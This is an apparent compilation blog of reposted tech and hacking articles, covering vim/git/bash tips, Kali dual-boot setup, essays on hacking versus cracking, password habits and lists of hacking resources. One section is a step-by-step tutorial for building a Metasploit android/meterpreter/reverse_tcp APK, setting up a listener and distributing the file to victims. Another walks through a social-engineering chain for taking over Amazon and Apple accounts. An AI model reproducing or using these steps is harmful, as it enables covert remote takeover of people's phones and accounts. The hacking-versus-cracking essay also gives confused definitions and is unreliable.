Unix hacking for fun and learning.

In our workflow we am always looking for ways to be more productive, and to have more fun while developing. There’s nothing quite like the feeling of flying through a sequence of commands in bash that you know would take your peers twice as long to execute. Have you ever :

• Raged silently at a coworker for spamming the left arrow key to get to the beginning of their terminal prompt when they could have just pressed CTRL + A ?
• Watched someone as they enter the same command over and over when they could have just prefaced it with ! ?
• Rolled your eyes as your buddy expounds at length on the virtues of IDEs when you know that you could “roflstomp” him or her using vim ?

If so, then these tips might be for you.
DISCLAIMER: There’s an admitted bias towards vim, git, and the terminal here. we don’t intend to start a holy war about terminal vs. IDEs, just have some fun and point out these fun tricks that work well for me.

git add -p

If you’ve worked with git for any non-trivial amount of time you hopefully have come across the notion of making atomic commits. Essentially, the notion is that a commit should contain only interrelated details, and not anything that’s logically unrelated to the things you are committing. For example, it makes sense to commit changes to a class and its corresponding unit test in one commit, but if you’ve made changes to another class that deal with completely different business logic then those should be in another commit.
However, what happens when you are working within one file that contains multiple unrelated changes, or changes that you’d like to split up into more than one commit in case you need to revert them separately? Or you have sprinkled logging statements all over the file that you don’t want to commit to the repo? The normal sequence of git commands that people use fails us here:

$ git diff
diff --git a/some-file.c b/some-file.c
index f383179..09e4e35 100644
--- a/some-file.c
+++ b/some-file.c
@@ -2,6 +2,8 @@

 int main(void) {
        printf("doing some stuff\n");
-       printf("doing some more stuff\n");
+       do_some_stuff();
+       printf("doing some unrelated stuff\n");
+       do_some_unrelated_stuff();
        return 0;
 }
$ git add some-file.c
$ git commit
[master 1938906] some unrelated stuff, cramming it all in one commit 'cause I'm lazy
 1 file changed, 3 insertions(+), 1 deletion(-)
$ echo "Whoops we just committed unrelated stuff.  Not very modular of us."

The -p (standing for patch) flag for git add is ridiculously useful for these kinds of cases. This tells git add that we want to do a partial add of the file, and we’re presented with a nice interative menu which allows us to specify with a lovely amount of detail exactly which parts of the file we want to stage. git splits the changes into hunks automatically, which you can approve or reject with y or n respectively, or use s to split up into finer grained hunks. If git can’t split the hunks up the way you want automatically, you can specify as much detail as you want with the e (edit) option.

And now our commits are nice and tidy.

See here for more details on git add -p
EDIT: Some commenters have pointed out that this usage of -p flag also works for commands such as git checkout --. Therefore you could hypothetically send only part of a file back to the way it was at HEAD, and keep your other changes. Handy!

vim’s CTRL-P / CTRL-N autocomplete feature

This is one of those killer features of vim that we are surprised to find out people (even experienced vim gurus) don’t use more frequently. Even if you are a casual user (hop into vim to edit some config files while sshed into a box) it has the potential to help you out quite a bit. One of the reasons people claim they couldn’t live without IDEs is the existence of features such as Intellisense that provide autocompletion of variable/function names. These features are very nice since they cut down on mistakes due to misspelling properties and thereby speed up the compile/run/debug cycle a fair bit. Many people don’t seem to realize that there is an analog which comes straight out of the box in vim, no plugins needed.
You can press CTRL-N to move down the list of suggested completions when typing in INSERT mode (which vim draws from the current buffers, and from the tags file if you have one), or CTRL-P to move back up (representing “NEXT” and “PREVIOUS” if you didn’t catch the mnemonic). If there is only one possible completion, vim will just go ahead and insert it. Very handy and speedy, especially in codebases with a lot of long variable / method / constant names.
CTRL-P/CTRL-N have a lot of synergy with the next tip as well, as touched upon briefly in the above paragraph.

And you barely need to leave the home row.

exuberant ctags

Everyone who uses vim knows that it can be a bit of a kerfluffle sometimes to open a file in a distant directory (tab completion helps ease this with :e, but it’s still not usually instantaneous). If you happen to be working on a team, or a very large project, the ability to do this quickly will likely be a vital part of your workflow.
Exuberant Ctags is a tool that makes this worlds easier than it would be without. With ctags, you can you just run a command in the top directory of the project you’re working on to generate a “tags” file, then you can use CTRL-] to “pop into” the definition of whatever it is your cursor is over (say, a class name). Press CTRL+T to get back to where you were before.
You can even set up a post-commit hook in git to generate your ctags file automatically when you make a commit! Nice.

CTRL-R in bash and zsh

Ever been typing in a command at the terminal, when you suddenly find yourself wishing that there was an easy way to just autofill the prompt with something that you’d entered previously so you can edit it or just run it again? If so, then I’ve got good news for you: You can! Just press CTRL+R and start typing the thing that you are looking for. The terminal will fill in what it thinks you are looking for, and if there is more than one option you can cycle through them by pressing CTRL+R repeatedly. When you’ve found the thing you’re after, you can break out of the prompt with any of the usual movement commands (CTRL+A, CTRL+E, arrow keys, etc. if you have standard bash keybindings). Try it out! Very handy if you can’t remember the name of the box you want to ssh into.

What was that IP address again?

history | grep $COMMAND will treat you well too, if you just want to review all of the times you’ve run that command in recent times.

vim macros

A lot of the time when you’re writing code, or doing related tasks, you find yourself in need of a way to repeat the same editor commands over and over, perhaps with a slight variation. Different editors provide slightly different ways of addressing this. Sublime Text, for example, has a “killer feature” where you are able to place multiple cursors in various locations and edit away. In vim (and in emacs too, but here we’ll be covering the vim method) you record and playback keyboard macros to accomplish this. It is a tool with an absurd amount of power and flexibility, and offers the chance to speed up productivity on repetitive editing tasks by an order of magnitude.
To make a macro, press q in normal mode, then press another key to “name” the macro (usually we use q again). vim will start recording your keystrokes. vim will remember which keystrokes you make until you press q again to save the macro. You can replay with @-letter in normal mode, so we are usually pressing @q. You can also preface the @/replay command with a number so that you can rapidly execute your macro over and over (like much in vim-land, the “grammar” behaves as you would be accustomed to). If you’re accustomed to using vim’s fancy movement commands (for instance, using / search to navigate), and practice a little bit, you will soon be able to whip up thunderous macros that will leave your mouse-dependent colleagues in the dust.

Hacking Android Smartphone Tutorial using Metasploit software on unix using Kali Linux

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.

What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Info:

use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Info:

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

Share this post if you found it useful
Courtsey: hacking-tutorial.com

Kali Linux Dual Boot with Windows

Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.
In our example, we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali linux Live as the installation medium. If you do not have a DVD or USB port on your computer, check out the Kali Linux Network Install. Ensure you have:

• Minimum of 8 GB free disk space on Windows
• CD-DVD / USB boot support

Preparing for the Installation

1. Download Kali Linux.
2. Burn The Kali Linux ISO to DVD or copy Kali Linux Live to USB.
3. Ensure that your computer is set to boot from CD / USB in your BIOS.

Dual Boot Installation Procedure

1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Select Live, and you should be booted into the Kali Linux default desktop.
2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.
   
   
3. Select your Windows partition. Depending on your system, it will usually be the second, larger partition. In our example, there are two partitions; the first is the System Recovery partition, and Windows is actually installed in /dev/sda2. Resize your Windows partition and leave enough space (8GB minimum) for the Kali installation.
   
   
4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.
   
   

Kali Linux Installation Procedure

1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install, until the point of the partitioning, where you need to select “Guided – use the largest continuous free space” that you created earlier with gparted.
   
   

Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali or Windows.

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your system. The Kali General Use section of our site has more information and you can also find tips on how to get the most out of Kali in our User Forums.

Courtsey: docs.kali.org

What is actually hacking? Don't worry, we will tell you.

The other day, a junior of mine was narrating to a group how he hacked into a friend's Facebook profile. Great, I thought. Kids nowadays are turning out to be pretty smart. However, his emphasis was on what he did (about a lame ass chat with a lame ass girl) rather than how he did it. Turns out his friend had left his account open, and he just happened to be there. The meme here says it all.

That is not hacking. Hacking is something completely different. A more popular story comes to my mind. Last year, the digital life of a Wired.com writer, Mat Honan, was completely destroyed by hackers (note that he was targeted just because they liked his three letter Twitter handle). The hacker, who contacted him later, calling himself Phobia, got a link to his personal website, which mentioned his Gmail address. They attempted a Google account recovery, which showed the alternate email address as m••••n@me.com.

The me.com email was associated with his Apple Account. Phobia got his billing address from a whois search on his personal domain. Getting the the credit card number was a bit tricky though. But not tricky enough.

First you call up Amazon and add a Credit Card to your account. All you need is a name, an email and a billing address. After that, you call them again and say you lost access to your account. On providing the name, billing address and the bogus credit card you added in your last call, Amazon allows you to add a new email address to your account. Viola! You have access to the Amazon account.

Next, with the actual credit card number, billing address and name, you call Apple Care and get the account reset. With the access to the Apple ID, you get access to the me.com ID, and then Gmail, and then whatever else is connected. The hackers erased all the information in his iPhone and Mac Book. Mat Honan managed to get everything back though, here's the story in his own words.

Let me tell you another one. Indian born Cornell University student Debarghya Das was requested by his friends to get the results of CICSE a day before they were launched. He studied the poorly written JavaScript in the page and generated a script to extract all the results (which were public surprisingly!) He has described the process in a Quora post. What he did after extracting the results is to analyse them and the  results were shocking. I would not stress on his conclusions but rather his process. Although, newspapers claimed he 'hacked' into the ICSE system, it was a result of simple web scraping.

These two contrasting stories bring me to my very point. Who is a hacker? Simply put, hackers are doers.

Source: http://on.fb.me/1aWkQpz

As the inforgraphic suggests, hacking doesn't necessarily mean searching for vulnerabilities in a computer system and taking advantage of those. A hacker is simply a computer enthusiast, who loves solving problems. Not just mathematical problems, but real life problems.

The common man, though, has a great misconception. The term hacker in generally associated with something which we fondly call crackers. A cracker is someone who seeks and exploits weaknesses in a computer system or network. Modern media is to blame, who have continuously confused the public with the use of the term hacker for the term cracker! Take for instance, the ruckus they created when Debarghya Das scraped the CICSE results. Newspapers like The Daily Mail, The Hindustan Times and The Times of India claimed that he 'hacked' into the system when it was a case of simple web scraping of publicly available data.

Then, there are personalities like Ankit Fadia are fooling the public with their hacking courses- you can't possibly hack into Gmail or Facebook by pressing a button or with one click. In fact, all those stories you hear are caused by the ignorance of the people, just like Mat Honan suggested. He says had he put a two step authentication in Gmail, his hack could never have progressed.

That being said, how do (read) crackers break into computer systems and networks? It's all about finding the right pattern in the labyrinth of data, which we call noise! You have just got to look hard enough, and you would definitely find the required pattern- and once you do, breaking in is a piece of cake.

In one of the TED talks last year, Angad Nadkarni, a self proclaimed hacker talks about hacking in general and how he 'hacked' into the Indian education system to save students from the noise of education in India- ranging from reference books to coaching institutions. Well, he was right in terms of the use of the term 'hacking' for sure. He named his application Examify.

What the application does is pretty simple. It takes in a large volume of question papers and analyses them to tell you what to study and what not to study. How does the application do it? Well, as it goes through the given data set, it assigns probabilities to different topics. That means the larger the data set, the more accurate the prediction.

It's basically a classic example of supervised machine learning, and more precisely a case of binary classification. Binary Classification involves classifying the members of a given set of objects into two groups based on whether they have some property or not. The process involves feeding the system a data set of past information so that it is able to predict with a certain amount of probability of the category or group of any new data.

In the case of Examify, the binary groups would be whether a question/topic would be asked in the next exam or not. Theoretically, we can go up to an infinite number of properties, but in general, we generally stick with a more humane number.

Examify is an example of how true hackers work. I would like to conclude with a quote by Rasmus Lerdorf, the creator of PHP.

I actually hate programming, but I love solving problems! And programming is an unfortunate way of solving the said problems...

Courtsey: http://theblogbowl.in

Hacking and Cracking?

Hacking, and cracking. Two different forms of Internet and computer related privacy and copyright breaches, usually malicious. I'll be discussing the differences between hacking, and cracking. They are two completely different things, but people usually get confused between the two, they both end with a similar sound, or 'acking' (that's probably why!) and they're both malicious forms of cyber activity. I'll be talking about the difference between hacking, and cracking. 

• Let's start off by explaining what the words mean, in computer vocabulary - that is. Hacking, is the act of stealing personal or private data, without the owner's knowledge or consent, it could also include other things like stealing passwords, creating a bot net, or pretty much any act that  breaches someone's privacy, without their knowledge, or consent.

• Now, on to cracking. Cracking is where edit a program's source code, or you could create a program, like a key generator (more commonly known as a 'keygen'), patch, or some sort of application that tricks an application in to thinking that a particular process has occurred. For example, a key generator and a patch for the Adobe Master Collection would trick the software in to thinking that the key entered is correct, and not let it  verify the key with the Adobe master server. Cracking is pretty much looking for a back door in software, and exploiting it for malicious use or for a copyright breaching act.

The difference (if you have not noticed it yet) is that a hacker is someone that uses their extensive knowledge of computer logic and code for malicious purposes, while a cracker - looks for back doors in programs, and exploits those back doors. Cracking is generally less harmful than hacking. Hackers are usually involved with web related hacking, like MySQL interception, or phishing, other forms of hacking would include things like brute force, or password lifting.

       

           Well, the difference is simple. One is more malicious than the other, crackers usually have an extensive knowledge in code related to Python and .NET (Visual Basic, C, C++, C#) and Objective C (Mac), while hackers are fluent in different forms of web code, like PHP, MySQL, Java Script , Ajax, and HTML and CSS. I hope, after reading this, we all have got what the difference between hacking, and cracking are. Basically, it's just what they do, that's the difference. 

Courtsey: http://hackingvscrackingb31.blogspot.in

Do you think setting your password as 'password' is a dumb thing?

Despite the increasing necessity to protect their digital assets, many people continue to share their passwords with friends, family members and even work colleagues.

NEW DELHI: A few weeks ago, the producers of Jimmy Kimmel's show were up to no good. Going around the streets of Los Angeles, they pretended to help people understand how secure their passwords were, by asking them to reveal, well, their password. And believe it or not, a few dummies fell for this piece of mischief and disclosed their passwords on national TV.

Now you'd think you would have known better, but it turns out that most of us are not very different. Lately, a lot has been said about cybersecurity - the private iCloud images of celebrities leaked, the Sony hack that laid bare the private correspondence among movie executives (even the employees' salary), SnapChat pictures which users thought were deleted, along with multiple Facebook and Twitter account hacks. SplashData came out with its annual list of the most common passwords used and the list proves that there are people who still use "123456" and "password" as their passwords (we kid you not!).

"In the wired 21st century, passwords are proliferating at an alarming rate," the firm said in its report. "It's no surprise, then, that users often succumb to password fatigue and commit such security sins as using passwords based on names or words culled from a dictionary, reusing passwords or writing them down on pieces of paper that are left lying around the office."

Despite high-profile data breaches becoming the norm and with 2014 being called the year of cyberhacks and leaks, people are still using passwords that should have been tossed in the bin a long time ago, simply because they don't see themselves as 'hack-worthy'.

Why would anybody hack me?
In the extremely grave context o the recent leaks, there are people who just see it as someone else's problem, because 'why would anyone want to hack them?' Shifani Reffai, a food and lifestyle writer, says she has nothing to lose even if her account does get hacked. "If you're not in the public eye, chances are that no one is actively trying to hack you. That's the reality. Therefore, there is no need to overcomplicate your passwords to the point that it becomes a challenge to remember them or even worse, end up writing them down on paper," she says.

She adds that though she does feel unsafe online, especially since what you share on one platform is synced with another, she'd rather curb her online activity in order to keep some of her privacy, than have complicated passwords that are too hard to remember.

Same password for all accounts easy to remember
Research shows that 16% of passwords matched a person's first name, 14% were patterns on the keyboard, 4% were variations of the word "password", 5% referenced pop-culture, and 4% likely described things nearby to the user when picking a password.

It is of no surprise, then, that the majority of people disclosing their passwords on Jimmy Kimmel's show, chose their birth dates and pet's name as their passwords. Now either you're a genius adept at remembering multiple sets of complex passwords, or you're just using the same basic password combinations for most accounts. There is more than one reason to believe the latter is true.

Kriti Aggarwal, co-founder of an event management firm in the city, says that cyberhacks don't stop her from having the same password for all accounts. "As far as I can remember, I've had the same password for all my accounts and it has also been the simplest and easiest to remember. The type of privacy I'm worried about isn't privacy from the government, marketers, spam or phishers," she explains. "It's privacy from my parents, siblings and colleagues. At most what I can be worried about is if my bank account details get leaked, but I think I am cautious enough when it comes to that. I don't have to worry about some really confidential in formation being leaked, because let's face it, I'm not that important." she says.


Sharing passwords with friends, family and colleagues
Despite the increasing necessity to protect their digital assets, many people continue to share their passwords with friends, family members and even work colleagues. Because according to them, they don't think that there is anything so compromising that they'll regret later.

Research has shown that people have gotten comfortable with sharing more information openly and with more people. "Most of my colleagues know my computer's password in office as someone or the other needs to use it once in a while. I have passwords of the websites I visit saved in my browser but I don't expect my colleagues to go through my personal emails or steal my bank account information because I trust them. Some of my friends have access to my Facebook and Twitter accounts as well because I have nothing to hide from them and hence, there is no need to use a complicated 'strong' password," says Gitika Sharma, a graphic designer.

Facebook, Gmail relatively safer
Facebook lets users have the option to adopt two-factor authentication, but it would be interesting to see just how many people have implemented it. This shows that there is still a wide gap between consumer knowledge and perception.

Gaurav Sharma doesn't think social networking sites such as Facebook and Twitter, and something as simple as checking your emails on Gmail, require a two-level authentication procedure. "Using a strong password does help a lot but the problem is that few of us can remember many such strong passwords. I do change passwords for my accounts, but not very frequently for Facebook and Gmail. I find these relatively safer websites to work on and don't find the need to turn two-factor on," says Gaurav.

So what is a good password?
Experts define a strong password as one that is 'difficult to crack, has combinations of upper and lower-case letters, number and special characters and should be different for each site' - definitely not the word "password". But the news isn't all that bad. Study also shows that even though the list of the most common passwords may be astonishing, the passwords in the list aren't necessarily the same as the most leaked ones.

People are moving away from using such passwords, but the rate is definitely slower than we'd expect.

Courtsey: TOI

Google Gmail users hit by software glitch

The glitch hit people using Gmail and some of Google's apps

Gmail users around the world saw errors and safety warnings over the weekend after Google forgot to update a key part of the messaging software.

Google said a "majority" of users were affected by the short-term software problem.
While people could still access and use Gmail many people saw "unexpected behaviour" because of the problem.
Many reported the errors via Twitter seeking clarification from Google about what had gone wrong.
The error messages started appearing early on 4 April and hit people trying to send email messages from Gmail and some of the firm's messaging apps.
The problems arose because Google had neglected to renew a security certificate for Gmail and its app services. The certificate helps the software establish a secure connection to a destination, so messages can be sent with little fear they will be spied upon.
Google's own in-house security service, called Authority G2, administers the security certificates and other secure software systems for the search giant.
Information about the problem was posted to status pages Google maintains for its apps and email services.
In the status message, Google said the problem was "affecting a majority of users" who were seeing error messages. It added that the glitch could cause programs to act in "unexpected" ways.
The problem was resolved about two hours after it was first noticed.
The glitch comes soon after Google started refusing security certificates issued by the China Internet Network Information Center (CNNIC). Google said a security lapse by the CNNIC meant the certificates could no longer be trusted. CNNIC called the decision "unacceptable and unintelligible".

Advanced Hardware Hacking Techniques

It is the pdf:
http://grandideastudio.com/wp-content/uploads/advanced_hardware_hacking_slides.pdf
Courtsey:  grandideastudio.com

Best free resouces to be pro Hacker

Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Some people recommend minimum knowledge of few programming languages like C, Python, HTML with Unix operating system concepts and networking knowledge is required to start learning hacking techniques.

Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and positive attitude towards problem solving. The security softwares are constantly evolving and therefore you must keep learning new things with a really fast pace.

If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. I hope these free resources will help you speed up on your learning. If you decide you pursue ethical hacking as a career option, you may also want to read some in depth ethical hacking books.

A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Its true that some common types of hacking can be easily done with help of tools, however doing it does not really make you a hacker. A true hacker is the one who can find a vulnerability and develop a tool to exploit and/or demonstrate it.

Hacking is not only about knowing "how things work", but its about knowing "why things work that way" and "how can we challenge it".

Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack:

Hacking For Dummies - Beginners Tutorials

These tutorials are not really simple for anyone who is just starting to learn hacking techniques. However, these should be simple starting point for you. I am sure you have different opinion about complexity of each tutorial however advanced hacker are going to be calling this a job of script kiddie (beginner hacker). Even to acquire the skills of a script kiddie you need to have good understanding of computer fundamentals and programming.

1. Cybrary - For those looking to learn ethical hacking skills online, Cybrary provides the perfect platform to do so. Cybrary is a free online IT and cyber security training network that provides instruction in the form of self-paced, easy-to-follow videos. Featuring courses on topics such as Penetration Testing and Ethical Hacking, Advanced Penetration Testing, Post Exploitation Hacking and Computer and Hacking Forensics, Cybrary provides instruction from the beginner to the highly-advanced level of hacking. Additionally, Cybrary offers supplemental study material along with their courses free of charge. With their in-depth training videos and study guides, Cybrary ensures that users develop the best hacking skills.
2. Hacking Tutorials for Beginners - By BreakTheSecurity.com
3. How to learn Ethical hacking - By Astalavista.com
4. Penetration Testing Tutorial - By Guru99.com
5. Backtrack Penetration Testing Tutorial
6. Introduction to Penetration Testing
7. Information Gathering with Nmap
8. Simple How To Articles By Open Web Application Security
9. The Six Dumbest Ideas in Computer Security
10. Secure Design Principles
11. 10 steps to secure software

Cryptography Related Tutorials

Cryptography is must know topic for any aspiring security professional or a ethical hacker. You must understand how encryption and decryption is done. You must understand why some of the old encryption techniques do not work in modern computing world.

This is a important area and a lot of software programmers and professional do not understand it very well. Learning cryptography involves a lot of good understanding of mathematics, this means you also need to have good fundamentals on discrete mathematics.

1. Introduction to Public Key Cryptography
2. Crypto Tutorial
3. Introduction to Cryptography
4. An Overview of Cryptography
5. Cryptography Tutorials - Herong's Tutorial Examples
6. The Crypto Tutorial - Learn How to Keep Secret Secret
7. Introduction to cryptology, Part 1: Basic Cryptology Concepts

Websites For Security Related Articles And News

These are some websites, that you may find useful to find hacking related resources and articles. A lot of simple tricks and tips are available for experimenting through these sites for improving yourself to become advanced hacker.

In recent years, many people are aspiring to learn how to hack. With growing interest in this area, a lot of different types of hacking practices are evolving. With popularity of social networks many people have inclined towards vulnerability in various social networks like facebook, twitter, and myspace etc.

Continuous learning about latest security issues, news and vulnerability reports are really important for any hacker or a security professional. Some of the sites that keep publishing informative articles and news are listed here.

1. http://www.astalavista.com/
2. http://packetstormsecurity.com/
3. http://www.blackhat.com/
4. http://www.metasploit.com/
5. http://sectools.org/
6. http://www.2600.com/
7. DEF CON - Hacking conference
8. http://www.breakthesecurity.com/
9. http://www.hacking-tutorial.com/
10. http://www.evilzone.org/
11. http://hackaday.com/
12. http://www.hitb.org/
13. http://www.hackthissite.org/
14. http://pentestmag.com
15. http://www.securitytube.net/
16. https://www.ssllabs.com/

EBooks And Whitepapers

Some of the research papers by security experts and gurus can provide you a lot of information and inspiration. White papers can be really difficult to read and understand therefore you may need to read them multiple times. Once you understand the topic well, reading will become much faster and you will be able to skim through a lot content in less time.

1. Handbook of Applied Cryptography - This ebook contains some free chapter from one of the popular cryptography books. The full book is also available on amazon at Cryptography Book.
2. Network Penetration testing Guide
3. How to hack anything in Java
4. Mcafee on iPhone and iPad Security
5. A Good Collection of White papers on security and vulnerabilities - This site contains collection of white papers from different sources and some of these white papers are really worth referring.
6. Engineering Principles for Information Technology Security
7. Basic Principles Of Information Protection
8. Open Web Application Security Project - OWASP is one of the most popular sites that contains web application security related information .

Videos & Play Lists

Those who like to watch video tutorials, here are few I liked. However there are many small video available on youtube. Feel free to explore more and share with us if you like something.

1. Cryptography Course By Dan Boneh Stanford University
2. Open Security Training- Youtube Playlist of More than 90 hours. I have found this to be the biggest free training available for security related topic.
3. OWASP AppSec USA 2011: Youtube Playlist containing compilation of OWASP conference highlight in 2011.
4. Defcon: How I Met your Girlfriend - Defcon is one of the most popular hacker conference. The presenters in this conference are well know inside the hacking industry.
5. Defcon: What happens when you steal a hackers computer
6. Defcon: Nmap: Scanning the Internet
7. Public Key Cryptography: Diffie-Hellman Key Exchange
8. Web application Pen testing
9. Intro to Scanning Nmap, Hping, Amap, TCPDump, Metasploit

Forums For Hackers And Security Professionals

Just like any other area, forums are really great help for learning from other experts. Hundreds of security experts and ethical/non-ethical hackers are willing to share their knowledge on forums for some reason. Please keep in mind to do enough research before post a question and be polite to people who take time to answer your question.

1. Stackoverflow for security professionals
2. http://darksat.x47.net/
3. http://forums.securityinfowatch.com/
4. http://forums.cnet.com/spyware-viruses-security-forum/
5. http://www.hackforums.net/forumdisplay.php?fid=47

Vulnerability Databases And Resources

Vulnerability Databases are the first place to start your day as a security professional. Any new vulnerability detection is generally available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability.

1. http://www.exploit-db.com/
2. http://1337day.com/
3. http://securityvulns.com/
4. http://www.securityfocus.com/
5. http://www.osvdb.org/
6. http://www.securiteam.com/
7. http://secunia.com/advisories/
8. http://insecure.org/sploits_all.html
9. http://zerodayinitiative.com/advisories/published/
10. http://nmrc.org/pub/index.html
11. http://web.nvd.nist.gov
12. http://www.vupen.com/english/security-advisories/
13. http://www.vupen.com/blog/
14. http://cvedetails.com/
15. http://www.rapid7.com/vulndb/index.jsp
16. http://oval.mitre.org/

Product Specific Vulnerability Information

Some of the very popular products in the world require a special attention and therefore you may want to look at the specific security websites directly from vendors. I have kept Linux. Microsoft and apache in this list, however it may apply to any product you may be heavily using.

1. Red Hat Security and other updates Site
2. Microsoft Products Security Bulletin
3. Apache Foundation Products Security Repository
4. Ubunut Software Security Center
5. Linux Security Repository

Tools And Programs For Hacking / Security

There are dozens of tools available for doing different types of hacking and tests. Tools are really important to become more productive at your work. Some of the very common tools that are used by hackers are listed here. You may have different choice of tools based on your own comfort.

1. nmap
2. NSS
3. Hping
4. TCPDump
5. Metasploit
6. Wireshark
7. Network Stuff
8. Nikto

 Courtsey: http://www.fromdev.com

Dangerous but still need to know-Educational purposes!

Increasing Militarization Of The Internet

The rise of Stuxnet, Flame, Gause, the Olympic Games operations and Shamoon have all shed light on the issue of nation-state driven cyberwarfare and cyberespionage activities. Now that we are in cyberspace, we have another domain for humans to occupy and dominate, according to Ed Skoudis, founder of Counter Hack Challenges.

Skoudis told RSA Conference 2013 attendees that he worries about some of the risks of taking action over the Internet. Many of the nation-state driven activities could have a tremendous impact on the private sector, he said. "It could have a cascading impact," he said. "It is possible that every cyberaction could cause bigger problems than people think." Some of the techniques outlined by Skoudis and Johannes Ullrich, chief research officer at the SANS Institute are not new, but they are being ramped up by cybercriminals to become a serious problem.

Here's a look at the five most dangerous new hacking techniques that concern top security experts Ullrich and Skoudis.

1. Rise Of Offensive Forensics
Anti-forensics is the process of cybercriminals getting into a targeted environment and hacking the forensics tools themselves. Offensive forensics is taking forensics techniques and analyzing file systems and memory in-depth then combing them for information assets and extracting them.


2. Mis-Attribuiton
   The industrial processes used to build Stuxnet and other malware provides unique fingerprints for malware analysis investigators to categorize it. Coding styles down to machine level language can indicate a specific threat actor. A nation-state backed cybercriminal that doesn't want to get noticed may place phony clues in malware to shake off investigators, Skoudis said. The catastrophic attack on Saudi Aramco via Shamoon infections on that company's workstations had some technical information that made investigators think it clearly wasn't the work of a nation-state. But, researchers at Kaspersky Lab provided evidence linking some specific characteristics to the Flame malware, an cyberespionage attack toolkit.


3. Computer Attacks Resulting In Kinetic Impact
   Historically we have worked to protect PII and PHI, bank records and trade secrets, but companies haven't had a good track record, Skoudis said. But, attackers are now targeting physical infrastructure such as industrial control systems and SCADA systems.
   "Some of it is just mischief, but it could be a harbinger of much bigger things to come," Skoudis said. "We are rapidly moving into the area where cyberattacks cause kinetic impact."
   Smaller systems are now at risk, such as automobiles, water distribution systems and traffic light control systems, which have buffer overflows, SQL injection flaws and other coding problems that can be exploited, he said. Attackers can infiltrate the devices and gain command and control of the infrastructure.


4. Large Scale DDoS Attacks
   U.S. banks have spent a lot of time investing substantial resources to defend distributed denial-of-service (DDoS) attacks. They are simple and don't require a lot of resources.
   While the attacks are not new, businesses and attackers have been playing a cat and mouse game, said Johannes Ullrich, chief research officer at the SANS Institute, told RSA Conference attendees. Attack tools are getting better at tricking DNS anti-DDoS defenses, he said. Attacks are getting larger, up to over 40 gigabits per second. The attacker only needs 2,000 bots to carry them out, Ullrich said.
   
   Courtsey: http://www.crn.com
   
    

World's Biggest Data Breaches- Beautifully explained

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Free Hacking Tools To Become Powerful Hacker-easy to read

A hacking tool is a computer program or software which helps a hacker to hack a computer system or a computer program. The existences of hacking tools have made the lives of the hackers much simpler when compared to the times they did not exist. But it does not mean that if the Hacker is equipped with a good hacking tool, his entire job is smoothly done. The hacker still requires the skills of all the aspects of hacking equally well.


Password Cracker Software

